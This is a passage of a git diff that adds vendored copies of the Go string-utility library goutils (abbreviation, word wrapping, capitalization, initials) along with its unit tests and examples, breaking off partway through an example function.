+		t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 32, 127, false, false, nil, random, x, out)
+	}
+
+	// Test 5: Simulating RandomSeed(...) with custom chars
+	chars := []rune{'1', '2', '3', 'a', 'b', 'c'}
+	out = "2b2ca"
+
+	if x, _ := RandomSeed(5, 0, 0, false, false, chars, random); x != out {
+		t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, false, chars, random, x, out)
+	}
+
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleRandomSeed() {
+
+	var seed int64 = 10 // If you change this seed #, the random sequence below will change
+	random := rand.New(rand.NewSource(seed))
+	chars := []rune{'1', '2', '3', 'a', 'b', 'c'}
+
+	rand1, _ := RandomSeed(5, 0, 0, true, true, nil, random)      // RandomAlphaNumeric (Alphabets and numbers possible)
+	rand2, _ := RandomSeed(5, 0, 0, true, false, nil, random)     // RandomAlphabetic (Only alphabets)
+	rand3, _ := RandomSeed(5, 0, 0, false, true, nil, random)     // RandomNumeric (Only numbers)
+	rand4, _ := RandomSeed(5, 32, 127, false, false, nil, random) // RandomAscii (Alphabets, numbers, and other ASCII chars)
+	rand5, _ := RandomSeed(5, 0, 0, true, true, chars, random)    // RandomSeed with custom characters
+
+	fmt.Println(rand1)
+	fmt.Println(rand2)
+	fmt.Println(rand3)
+	fmt.Println(rand4)
+	fmt.Println(rand5)
+	// Output:
+	// 3ip9v
+	// MBrbj
+	// 88935
+	// H_I;E
+	// 2b2ca
+}
diff --git a/vendor/github.com/aokoli/goutils/stringutils.go b/vendor/github.com/aokoli/goutils/stringutils.go
new file mode 100644
index 0000000000..5037c4516b
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/stringutils.go
@@ -0,0 +1,224 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package goutils
+
+import (
+	"bytes"
+	"fmt"
+	"strings"
+	"unicode"
+)
+
+// Typically returned by functions where a searched item cannot be found
+const INDEX_NOT_FOUND = -1
+
+/*
+Abbreviate abbreviates a string using ellipses. This will turn  the string "Now is the time for all good men" into "Now is the time for..."
+
+Specifically, the algorithm is as follows:
+
+    - If str is less than maxWidth characters long, return it.
+    - Else abbreviate it to (str[0:maxWidth - 3] + "...").
+    - If maxWidth is less than 4, return an illegal argument error.
+    - In no case will it return a string of length greater than maxWidth.
+
+Parameters:
+    str -  the string to check
+    maxWidth - maximum length of result string, must be at least 4
+
+Returns:
+    string - abbreviated string
+    error - if the width is too small
+*/
+func Abbreviate(str string, maxWidth int) (string, error) {
+	return AbbreviateFull(str, 0, maxWidth)
+}
+
+/*
+AbbreviateFull abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "...is the time for..."
+This function works like Abbreviate(string, int), but allows you to specify a "left edge" offset. Note that this left edge is not
+necessarily going to be the leftmost character in the result, or the first character following the ellipses, but it will appear
+somewhere in the result.
+In no case will it return a string of length greater than maxWidth.
+
+Parameters:
+    str - the string to check
+    offset - left edge of source string
+    maxWidth - maximum length of result string, must be at least 4
+
+Returns:
+    string - abbreviated string
+    error - if the width is too small
+*/
+func AbbreviateFull(str string, offset int, maxWidth int) (string, error) {
+	if str == "" {
+		return "", nil
+	}
+	if maxWidth < 4 {
+		err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width is 4")
+		return "", err
+	}
+	if len(str) <= maxWidth {
+		return str, nil
+	}
+	if offset > len(str) {
+		offset = len(str)
+	}
+	if len(str)-offset < (maxWidth - 3) { // 15 - 5 < 10 - 3 =  10 < 7
+		offset = len(str) - (maxWidth - 3)
+	}
+	abrevMarker := "..."
+	if offset <= 4 {
+		return str[0:maxWidth-3] + abrevMarker, nil // str.substring(0, maxWidth - 3) + abrevMarker;
+	}
+	if maxWidth < 7 {
+		err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width with offset is 7")
+		return "", err
+	}
+	if (offset + maxWidth - 3) < len(str) { // 5 + (10-3) < 15 = 12 < 15
+		abrevStr, _ := Abbreviate(str[offset:len(str)], (maxWidth - 3))
+		return abrevMarker + abrevStr, nil // abrevMarker + abbreviate(str.substring(offset), maxWidth - 3);
+	}
+	return abrevMarker + str[(len(str)-(maxWidth-3)):len(str)], nil // abrevMarker + str.substring(str.length() - (maxWidth - 3));
+}
+
+/*
+DeleteWhiteSpace deletes all whitespaces from a string as defined by unicode.IsSpace(rune).
+It returns the string without whitespaces.
+
+Parameter:
+    str - the string to delete whitespace from, may be nil
+
+Returns:
+    the string without whitespaces
+*/
+func DeleteWhiteSpace(str string) string {
+	if str == "" {
+		return str
+	}
+	sz := len(str)
+	var chs bytes.Buffer
+	count := 0
+	for i := 0; i < sz; i++ {
+		ch := rune(str[i])
+		if !unicode.IsSpace(ch) {
+			chs.WriteRune(ch)
+			count++
+		}
+	}
+	if count == sz {
+		return str
+	}
+	return chs.String()
+}
+
+/*
+IndexOfDifference compares two strings, and returns the index at which the strings begin to differ.
+
+Parameters:
+    str1 - the first string
+    str2 - the second string
+
+Returns:
+    the index where str1 and str2 begin to differ; -1 if they are equal
+*/
+func IndexOfDifference(str1 string, str2 string) int {
+	if str1 == str2 {
+		return INDEX_NOT_FOUND
+	}
+	if IsEmpty(str1) || IsEmpty(str2) {
+		return 0
+	}
+	var i int
+	for i = 0; i < len(str1) && i < len(str2); i++ {
+		if rune(str1[i]) != rune(str2[i]) {
+			break
+		}
+	}
+	if i < len(str2) || i < len(str1) {
+		return i
+	}
+	return INDEX_NOT_FOUND
+}
+
+/*
+IsBlank checks if a string is whitespace or empty (""). Observe the following behavior:
+
+    goutils.IsBlank("")        = true
+    goutils.IsBlank(" ")       = true
+    goutils.IsBlank("bob")     = false
+    goutils.IsBlank("  bob  ") = false
+
+Parameter:
+    str - the string to check
+
+Returns:
+    true - if the string is whitespace or empty ("")
+*/
+func IsBlank(str string) bool {
+	strLen := len(str)
+	if str == "" || strLen == 0 {
+		return true
+	}
+	for i := 0; i < strLen; i++ {
+		if unicode.IsSpace(rune(str[i])) == false {
+			return false
+		}
+	}
+	return true
+}
+
+/*
+IndexOf returns the index of the first instance of sub in str, with the search beginning from the
+index start point specified. -1 is returned if sub is not present in str.
+
+An empty string ("") will return -1 (INDEX_NOT_FOUND). A negative start position is treated as zero.
+A start position greater than the string length returns -1.
+
+Parameters:
+    str - the string to check
+    sub - the substring to find
+    start - the start position; negative treated as zero
+
+Returns:
+    the first index where the sub string was found  (always >= start)
+*/
+func IndexOf(str string, sub string, start int) int {
+
+	if start < 0 {
+		start = 0
+	}
+
+	if len(str) < start {
+		return INDEX_NOT_FOUND
+	}
+
+	if IsEmpty(str) || IsEmpty(sub) {
+		return INDEX_NOT_FOUND
+	}
+
+	partialIndex := strings.Index(str[start:len(str)], sub)
+	if partialIndex == -1 {
+		return INDEX_NOT_FOUND
+	}
+	return partialIndex + start
+}
+
+// IsEmpty checks if a string is empty (""). Returns true if empty, and false otherwise.
+func IsEmpty(str string) bool {
+	return len(str) == 0
+}
diff --git a/vendor/github.com/aokoli/goutils/stringutils_test.go b/vendor/github.com/aokoli/goutils/stringutils_test.go
new file mode 100644
index 0000000000..dae93132a0
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/stringutils_test.go
@@ -0,0 +1,309 @@
+package goutils
+
+import (
+	"fmt"
+	"testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestAbbreviate(t *testing.T) {
+
+	// Test 1
+	in := "abcdefg"
+	out := "abc..."
+	maxWidth := 6
+
+	if x, _ := Abbreviate(in, maxWidth); x != out {
+		t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+	}
+
+	// Test 2
+	out = "abcdefg"
+	maxWidth = 7
+
+	if x, _ := Abbreviate(in, maxWidth); x != out {
+		t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+	}
+
+	// Test 3
+	out = "a..."
+	maxWidth = 4
+
+	if x, _ := Abbreviate(in, maxWidth); x != out {
+		t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+	}
+}
+
+func TestAbbreviateFull(t *testing.T) {
+
+	// Test 1
+	in := "abcdefghijklmno"
+	out := "abcdefg..."
+	offset := -1
+	maxWidth := 10
+
+	if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+		t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+	}
+
+	// Test 2
+	out = "...fghi..."
+	offset = 5
+	maxWidth = 10
+
+	if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+		t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+	}
+
+	// Test 3
+	out = "...ijklmno"
+	offset = 12
+	maxWidth = 10
+
+	if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+		t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+	}
+}
+
+func TestIndexOf(t *testing.T) {
+
+	// Test 1
+	str := "abcafgka"
+	sub := "a"
+	start := 0
+	out := 0
+
+	if x := IndexOf(str, sub, start); x != out {
+		t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+	}
+
+	// Test 2
+	start = 1
+	out = 3
+
+	if x := IndexOf(str, sub, start); x != out {
+		t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+	}
+
+	// Test 3
+	start = 4
+	out = 7
+
+	if x := IndexOf(str, sub, start); x != out {
+		t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+	}
+
+	// Test 4
+	sub = "z"
+	out = -1
+
+	if x := IndexOf(str, sub, start); x != out {
+		t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+	}
+
+}
+
+func TestIsBlank(t *testing.T) {
+
+	// Test 1
+	str := ""
+	out := true
+
+	if x := IsBlank(str); x != out {
+		t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+	}
+
+	// Test 2
+	str = "   "
+	out = true
+
+	if x := IsBlank(str); x != out {
+		t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+	}
+
+	// Test 3
+	str = " abc "
+	out = false
+
+	if x := IsBlank(str); x != out {
+		t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+	}
+}
+
+func TestDeleteWhiteSpace(t *testing.T) {
+
+	// Test 1
+	str := " a b c "
+	out := "abc"
+
+	if x := DeleteWhiteSpace(str); x != out {
+		t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+	}
+
+	// Test 2
+	str = "    "
+	out = ""
+
+	if x := DeleteWhiteSpace(str); x != out {
+		t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+	}
+}
+
+func TestIndexOfDifference(t *testing.T) {
+
+	str1 := "abc"
+	str2 := "a_c"
+	out := 1
+
+	if x := IndexOfDifference(str1, str2); x != out {
+		t.Errorf("IndexOfDifference(%v, %v) = %v, want %v", str1, str2, x, out)
+	}
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleAbbreviate() {
+
+	str := "abcdefg"
+	out1, _ := Abbreviate(str, 6)
+	out2, _ := Abbreviate(str, 7)
+	out3, _ := Abbreviate(str, 8)
+	out4, _ := Abbreviate(str, 4)
+	_, err1 := Abbreviate(str, 3)
+
+	fmt.Println(out1)
+	fmt.Println(out2)
+	fmt.Println(out3)
+	fmt.Println(out4)
+	fmt.Println(err1)
+	// Output:
+	// abc...
+	// abcdefg
+	// abcdefg
+	// a...
+	// stringutils illegal argument: Minimum abbreviation width is 4
+}
+
+func ExampleAbbreviateFull() {
+
+	str := "abcdefghijklmno"
+	str2 := "abcdefghij"
+	out1, _ := AbbreviateFull(str, -1, 10)
+	out2, _ := AbbreviateFull(str, 0, 10)
+	out3, _ := AbbreviateFull(str, 1, 10)
+	out4, _ := AbbreviateFull(str, 4, 10)
+	out5, _ := AbbreviateFull(str, 5, 10)
+	out6, _ := AbbreviateFull(str, 6, 10)
+	out7, _ := AbbreviateFull(str, 8, 10)
+	out8, _ := AbbreviateFull(str, 10, 10)
+	out9, _ := AbbreviateFull(str, 12, 10)
+	_, err1 := AbbreviateFull(str2, 0, 3)
+	_, err2 := AbbreviateFull(str2, 5, 6)
+
+	fmt.Println(out1)
+	fmt.Println(out2)
+	fmt.Println(out3)
+	fmt.Println(out4)
+	fmt.Println(out5)
+	fmt.Println(out6)
+	fmt.Println(out7)
+	fmt.Println(out8)
+	fmt.Println(out9)
+	fmt.Println(err1)
+	fmt.Println(err2)
+	// Output:
+	// abcdefg...
+	// abcdefg...
+	// abcdefg...
+	// abcdefg...
+	// ...fghi...
+	// ...ghij...
+	// ...ijklmno
+	// ...ijklmno
+	// ...ijklmno
+	// stringutils illegal argument: Minimum abbreviation width is 4
+	// stringutils illegal argument: Minimum abbreviation width with offset is 7
+}
+
+func ExampleIsBlank() {
+
+	out1 := IsBlank("")
+	out2 := IsBlank(" ")
+	out3 := IsBlank("bob")
+	out4 := IsBlank("  bob  ")
+
+	fmt.Println(out1)
+	fmt.Println(out2)
+	fmt.Println(out3)
+	fmt.Println(out4)
+	// Output:
+	// true
+	// true
+	// false
+	// false
+}
+
+func ExampleDeleteWhiteSpace() {
+
+	out1 := DeleteWhiteSpace(" ")
+	out2 := DeleteWhiteSpace("bob")
+	out3 := DeleteWhiteSpace("bob   ")
+	out4 := DeleteWhiteSpace("  b  o    b  ")
+
+	fmt.Println(out1)
+	fmt.Println(out2)
+	fmt.Println(out3)
+	fmt.Println(out4)
+	// Output:
+	//
+	// bob
+	// bob
+	// bob
+}
+
+func ExampleIndexOf() {
+
+	str := "abcdefgehije"
+	out1 := IndexOf(str, "e", 0)
+	out2 := IndexOf(str, "e", 5)
+	out3 := IndexOf(str, "e", 8)
+	out4 := IndexOf(str, "eh", 0)
+	out5 := IndexOf(str, "eh", 22)
+	out6 := IndexOf(str, "z", 0)
+	out7 := IndexOf(str, "", 0)
+
+	fmt.Println(out1)
+	fmt.Println(out2)
+	fmt.Println(out3)
+	fmt.Println(out4)
+	fmt.Println(out5)
+	fmt.Println(out6)
+	fmt.Println(out7)
+	// Output:
+	// 4
+	// 7
+	// 11
+	// 7
+	// -1
+	// -1
+	// -1
+}
+
+func ExampleIndexOfDifference() {
+
+	out1 := IndexOfDifference("abc", "abc")
+	out2 := IndexOfDifference("ab", "abxyz")
+	out3 := IndexOfDifference("", "abc")
+	out4 := IndexOfDifference("abcde", "abxyz")
+
+	fmt.Println(out1)
+	fmt.Println(out2)
+	fmt.Println(out3)
+	fmt.Println(out4)
+	// Output:
+	// -1
+	// 2
+	// 0
+	// 2
+}
diff --git a/vendor/github.com/aokoli/goutils/wordutils.go b/vendor/github.com/aokoli/goutils/wordutils.go
new file mode 100644
index 0000000000..e92dd39900
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/wordutils.go
@@ -0,0 +1,356 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+/*
+Package goutils provides utility functions to manipulate strings in various ways.
+The code snippets below show examples of how to use goutils. Some functions return
+errors while others do not, so usage would vary as a result.
+
+Example:
+
+    package main
+
+    import (
+        "fmt"
+        "github.com/aokoli/goutils"
+    )
+
+    func main() {
+
+        // EXAMPLE 1: A goutils function which returns no errors
+        fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF"
+
+
+
+        // EXAMPLE 2: A goutils function which returns an error
+        rand1, err1 := goutils.Random (-1, 0, 0, true, true)
+
+        if err1 != nil {
+            fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...)
+        } else {
+            fmt.Println(rand1)
+        }
+    }
+*/
+package goutils
+
+import (
+	"bytes"
+	"strings"
+	"unicode"
+)
+
+// VERSION indicates the current version of goutils
+const VERSION = "1.0.0"
+
+/*
+Wrap wraps a single line of text, identifying words by ' '.
+New lines will be separated by '\n'. Very long words, such as URLs will not be wrapped.
+Leading spaces on a new line are stripped. Trailing spaces are not stripped.
+
+Parameters:
+    str - the string to be word wrapped
+    wrapLength - the column (a column can fit only one character) to wrap the words at, less than 1 is treated as 1
+
+Returns:
+    a line with newlines inserted
+*/
+func Wrap(str string, wrapLength int) string {
+	return WrapCustom(str, wrapLength, "", false)
+}
+
+/*
+WrapCustom wraps a single line of text, identifying words by ' '.
+Leading spaces on a new line are stripped. Trailing spaces are not stripped.
+
+Parameters:
+    str - the string to be word wrapped
+    wrapLength - the column number (a column can fit only one character) to wrap the words at, less than 1 is treated as 1
+    newLineStr - the string to insert for a new line, "" uses '\n'
+    wrapLongWords - true if long words (such as URLs) should be wrapped
+
+Returns:
+    a line with newlines inserted
+*/
+func WrapCustom(str string, wrapLength int, newLineStr string, wrapLongWords bool) string {
+
+	if str == "" {
+		return ""
+	}
+	if newLineStr == "" {
+		newLineStr = "\n" // TODO Assumes "\n" is seperator. Explore SystemUtils.LINE_SEPARATOR from Apache Commons
+	}
+	if wrapLength < 1 {
+		wrapLength = 1
+	}
+
+	inputLineLength := len(str)
+	offset := 0
+
+	var wrappedLine bytes.Buffer
+
+	for inputLineLength-offset > wrapLength {
+
+		if rune(str[offset]) == ' ' {
+			offset++
+			continue
+		}
+
+		end := wrapLength + offset + 1
+		spaceToWrapAt := strings.LastIndex(str[offset:end], " ") + offset
+
+		if spaceToWrapAt >= offset {
+			// normal word (not longer than wrapLength)
+			wrappedLine.WriteString(str[offset:spaceToWrapAt])
+			wrappedLine.WriteString(newLineStr)
+			offset = spaceToWrapAt + 1
+
+		} else {
+			// long word or URL
+			if wrapLongWords {
+				end := wrapLength + offset
+				// long words are wrapped one line at a time
+				wrappedLine.WriteString(str[offset:end])
+				wrappedLine.WriteString(newLineStr)
+				offset += wrapLength
+			} else {
+				// long words aren't wrapped, just extended beyond limit
+				end := wrapLength + offset
+				spaceToWrapAt = strings.IndexRune(str[end:len(str)], ' ') + end
+				if spaceToWrapAt >= 0 {
+					wrappedLine.WriteString(str[offset:spaceToWrapAt])
+					wrappedLine.WriteString(newLineStr)
+					offset = spaceToWrapAt + 1
+				} else {
+					wrappedLine.WriteString(str[offset:len(str)])
+					offset = inputLineLength
+				}
+			}
+		}
+	}
+
+	wrappedLine.WriteString(str[offset:len(str)])
+
+	return wrappedLine.String()
+
+}
+
+/*
+Capitalize capitalizes all the delimiter separated words in a string. Only the first letter of each word is changed.
+To convert the rest of each word to lowercase at the same time, use CapitalizeFully(str string, delimiters ...rune).
+The delimiters represent a set of characters understood to separate words. The first string character
+and the first non-delimiter character after a delimiter will be capitalized. A "" input string returns "".
+Capitalization uses the Unicode title case, normally equivalent to upper case.
+
+Parameters:
+    str - the string to capitalize
+    delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter
+
+Returns:
+    capitalized string
+*/
+func Capitalize(str string, delimiters ...rune) string {
+
+	var delimLen int
+
+	if delimiters == nil {
+		delimLen = -1
+	} else {
+		delimLen = len(delimiters)
+	}
+
+	if str == "" || delimLen == 0 {
+		return str
+	}
+
+	buffer := []rune(str)
+	capitalizeNext := true
+	for i := 0; i < len(buffer); i++ {
+		ch := buffer[i]
+		if isDelimiter(ch, delimiters...) {
+			capitalizeNext = true
+		} else if capitalizeNext {
+			buffer[i] = unicode.ToTitle(ch)
+			capitalizeNext = false
+		}
+	}
+	return string(buffer)
+
+}
+
+/*
+CapitalizeFully converts all the delimiter separated words in a string into capitalized words, that is each word is made up of a
+titlecase character and then a series of lowercase characters. The delimiters represent a set of characters understood
+to separate words. The first string character and the first non-delimiter character after a delimiter will be capitalized.
+Capitalization uses the Unicode title case, normally equivalent to upper case.
+
+Parameters:
+    str - the string to capitalize fully
+    delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter
+
+Returns:
+    capitalized string
+*/
+func CapitalizeFully(str string, delimiters ...rune) string {
+
+	var delimLen int
+
+	if delimiters == nil {
+		delimLen = -1
+	} else {
+		delimLen = len(delimiters)
+	}
+
+	if str == "" || delimLen == 0 {
+		return str
+	}
+	str = strings.ToLower(str)
+	return Capitalize(str, delimiters...)
+}
+
+/*
+Uncapitalize uncapitalizes all the whitespace separated words in a string. Only the first letter of each word is changed.
+The delimiters represent a set of characters understood to separate words. The first string character and the first non-delimiter
+character after a delimiter will be uncapitalized. Whitespace is defined by unicode.IsSpace(char).
+
+Parameters:
+    str - the string to uncapitalize fully
+    delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter
+
+Returns:
+    uncapitalized string
+*/
+func Uncapitalize(str string, delimiters ...rune) string {
+
+	var delimLen int
+
+	if delimiters == nil {
+		delimLen = -1
+	} else {
+		delimLen = len(delimiters)
+	}
+
+	if str == "" || delimLen == 0 {
+		return str
+	}
+
+	buffer := []rune(str)
+	uncapitalizeNext := true // TODO Always makes capitalize/un apply to first char.
+	for i := 0; i < len(buffer); i++ {
+		ch := buffer[i]
+		if isDelimiter(ch, delimiters...) {
+			uncapitalizeNext = true
+		} else if uncapitalizeNext {
+			buffer[i] = unicode.ToLower(ch)
+			uncapitalizeNext = false
+		}
+	}
+	return string(buffer)
+}
+
+/*
+SwapCase swaps the case of a string using a word based algorithm.
+
+Conversion algorithm:
+
+    Upper case character converts to Lower case
+    Title case character converts to Lower case
+    Lower case character after Whitespace or at start converts to Title case
+    Other Lower case character converts to Upper case
+    Whitespace is defined by unicode.IsSpace(char).
+
+Parameters:
+    str - the string to swap case
+
+Returns:
+    the changed string
+*/
+func SwapCase(str string) string {
+	if str == "" {
+		return str
+	}
+	buffer := []rune(str)
+
+	whitespace := true
+
+	for i := 0; i < len(buffer); i++ {
+		ch := buffer[i]
+		if unicode.IsUpper(ch) {
+			buffer[i] = unicode.ToLower(ch)
+			whitespace = false
+		} else if unicode.IsTitle(ch) {
+			buffer[i] = unicode.ToLower(ch)
+			whitespace = false
+		} else if unicode.IsLower(ch) {
+			if whitespace {
+				buffer[i] = unicode.ToTitle(ch)
+				whitespace = false
+			} else {
+				buffer[i] = unicode.ToUpper(ch)
+			}
+		} else {
+			whitespace = unicode.IsSpace(ch)
+		}
+	}
+	return string(buffer)
+}
+
+/*
+Initials extracts the initial letters from each word in the string. The first letter of the string and all first
+letters after the defined delimiters are returned as a new string. Their case is not changed. If the delimiters
+parameter is excluded, then Whitespace is used. Whitespace is defined by unicode.IsSpacea(char). An empty delimiter array returns an empty string.
+
+Parameters:
+    str - the string to get initials from
+    delimiters - set of characters to determine words, exclusion of this parameter means whitespace would be delimeter
+Returns:
+    string of initial letters
+*/
+func Initials(str string, delimiters ...rune) string {
+	if str == "" {
+		return str
+	}
+	if delimiters != nil && len(delimiters) == 0 {
+		return ""
+	}
+	strLen := len(str)
+	var buf bytes.Buffer
+	lastWasGap := true
+	for i := 0; i < strLen; i++ {
+		ch := rune(str[i])
+
+		if isDelimiter(ch, delimiters...) {
+			lastWasGap = true
+		} else if lastWasGap {
+			buf.WriteRune(ch)
+			lastWasGap = false
+		}
+	}
+	return buf.String()
+}
+
+// private function (lower case func name)
+func isDelimiter(ch rune, delimiters ...rune) bool {
+	if delimiters == nil {
+		return unicode.IsSpace(ch)
+	}
+	for _, delimiter := range delimiters {
+		if ch == delimiter {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/aokoli/goutils/wordutils_test.go b/vendor/github.com/aokoli/goutils/wordutils_test.go
new file mode 100644
index 0000000000..377d9439c9
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/wordutils_test.go
@@ -0,0 +1,225 @@
+package goutils
+
+import (
+	"fmt"
+	"testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestWrapNormalWord(t *testing.T) {
+
+	in := "Bob Manuel Bob Manuel"
+	out := "Bob Manuel\nBob Manuel"
+	wrapLength := 10
+
+	if x := Wrap(in, wrapLength); x != out {
+		t.Errorf("Wrap(%v) = %v, want %v", in, x, out)
+	}
+}
+
+func TestWrapCustomLongWordFalse(t *testing.T) {
+
+	in := "BobManuelBob Bob"
+	out := "BobManuelBob<br\\>Bob"
+	wrapLength := 10
+	newLineStr := "<br\\>"
+	wrapLongWords := false
+
+	if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out {
+		t.Errorf("Wrap(%v) = %v, want %v", in, x, out)
+	}
+}
+
+func TestWrapCustomLongWordTrue(t *testing.T) {
+
+	in := "BobManuelBob Bob"
+	out := "BobManuelB<br\\>ob Bob"
+	wrapLength := 10
+	newLineStr := "<br\\>"
+	wrapLongWords := true
+
+	if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out {
+		t.Errorf("WrapCustom(%v) = %v, want %v", in, x, out)
+	}
+}
+
+func TestCapitalize(t *testing.T) {
+
+	// Test 1: Checks if function works with 1 parameter, and default whitespace delimiter
+	in := "test is going.well.thank.you.for inquiring"
+	out := "Test Is Going.well.thank.you.for Inquiring"
+
+	if x := Capitalize(in); x != out {
+		t.Errorf("Capitalize(%v) = %v, want %v", in, x, out)
+	}
+
+	// Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.'
+	out = "Test Is Going.Well.Thank.You.For Inquiring"
+	delimiters := []rune{' ', '.'}
+
+	if x := Capitalize(in, delimiters...); x != out {
+		t.Errorf("Capitalize(%v) = %v, want %v", in, x, out)
+	}
+}
+
+func TestCapitalizeFully(t *testing.T) {
+
+	// Test 1
+	in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING"
+	out := "Test Is Going.well.thank.you.for Inquiring"
+
+	if x := CapitalizeFully(in); x != out {
+		t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out)
+	}
+
+	// Test 2
+	out = "Test Is Going.Well.Thank.You.For Inquiring"
+	delimiters := []rune{' ', '.'}
+
+	if x := CapitalizeFully(in, delimiters...); x != out {
+		t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out)
+	}
+}
+
+func TestUncapitalize(t *testing.T) {
+
+	// Test 1: Checks if function works with 1 parameter, and default whitespace delimiter
+	in := "This Is A.Test"
+	out := "this is a.Test"
+
+	if x := Uncapitalize(in); x != out {
+		t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out)
+	}
+
+	// Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.'
+	out = "this is a.test"
+	delimiters := []rune{' ', '.'}
+
+	if x := Uncapitalize(in, delimiters...); x != out {
+		t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out)
+	}
+}
+
+func TestSwapCase(t *testing.T) {
+
+	in := "This Is A.Test"
+	out := "tHIS iS a.tEST"
+
+	if x := SwapCase(in); x != out {
+		t.Errorf("SwapCase(%v) = %v, want %v", in, x, out)
+	}
+}
+
+func TestInitials(t *testing.T) {
+
+	// Test 1
+	in := "John Doe.Ray"
+	out := "JD"
+
+	if x := Initials(in); x != out {
+		t.Errorf("Initials(%v) = %v, want %v", in, x, out)
+	}
+
+	// Test 2
+	out = "JDR"
+	delimiters := []rune{' ', '.'}
+
+	if x := Initials(in, delimiters...); x != out {
+		t.Errorf("Initials(%v) = %v, want %v", in, x, out)
+	}
+
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleWrap() {
+
+	in := "Bob Manuel Bob Manuel"
+	wrapLength := 10
+
+	fmt.Println(Wrap(in, wrapLength))
+	// Output:
+	// Bob Manuel
+	// Bob Manuel
+}
+
+func ExampleWrapCustom_1() {
+
+	in := "BobManuelBob Bob"
+	wrapLength := 10
+	newLineStr := "<br\\>"
+	wrapLongWords := false
+
+	fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords))
+	// Output:
+	// BobManuelBob<br\>Bob
+}
+
+func ExampleWrapCustom_2() {
+
+	in := "BobManuelBob Bob"
+	wrapLength := 10
+	newLineStr := "<br\\>"
+	wrapLongWords := true
+
+	fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords))
+	// Output:
+	// BobManuelB<br\>ob Bob
+}
+
+func ExampleCapitalize() {
+
+	in := "test is going.well.thank.you.for inquiring" // Compare input to CapitalizeFully example
+	delimiters := []rune{' ', '.'}
+
+	fmt.Println(Capitalize(in))
+	fmt.Println(Capitalize(in, delimiters...))
+	// Output:
+	// Test Is Going.well.thank.you.for Inquiring
+	// Test Is Going.Well.Thank.You.For Inquiring
+}
+
+func ExampleCapitalizeFully() {
+
+	in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING" // Notice scattered capitalization
+	delimiters := []rune{' ', '.'}
+
+	fmt.Println(CapitalizeFully(in))
+	fmt.Println(CapitalizeFully(in, delimiters...))
+	// Output:
+	// Test Is Going.well.thank.you.for Inquiring
+	// Test Is Going.Well.Thank.You.For Inquiring
+}
+
+func ExampleUncapitalize() {
+
+	in := "This Is A.Test"
+	delimiters := []rune{' ', '.'}
+
+	fmt.Println(Uncapitalize(in))
+	fmt.Println(Uncapitalize(in, delimiters...))
+	// Output:
+	// this is a.Test
+	// this is a.test
+}
+
+func ExampleSwapCase() {
+
+	in := "This Is A.Test"
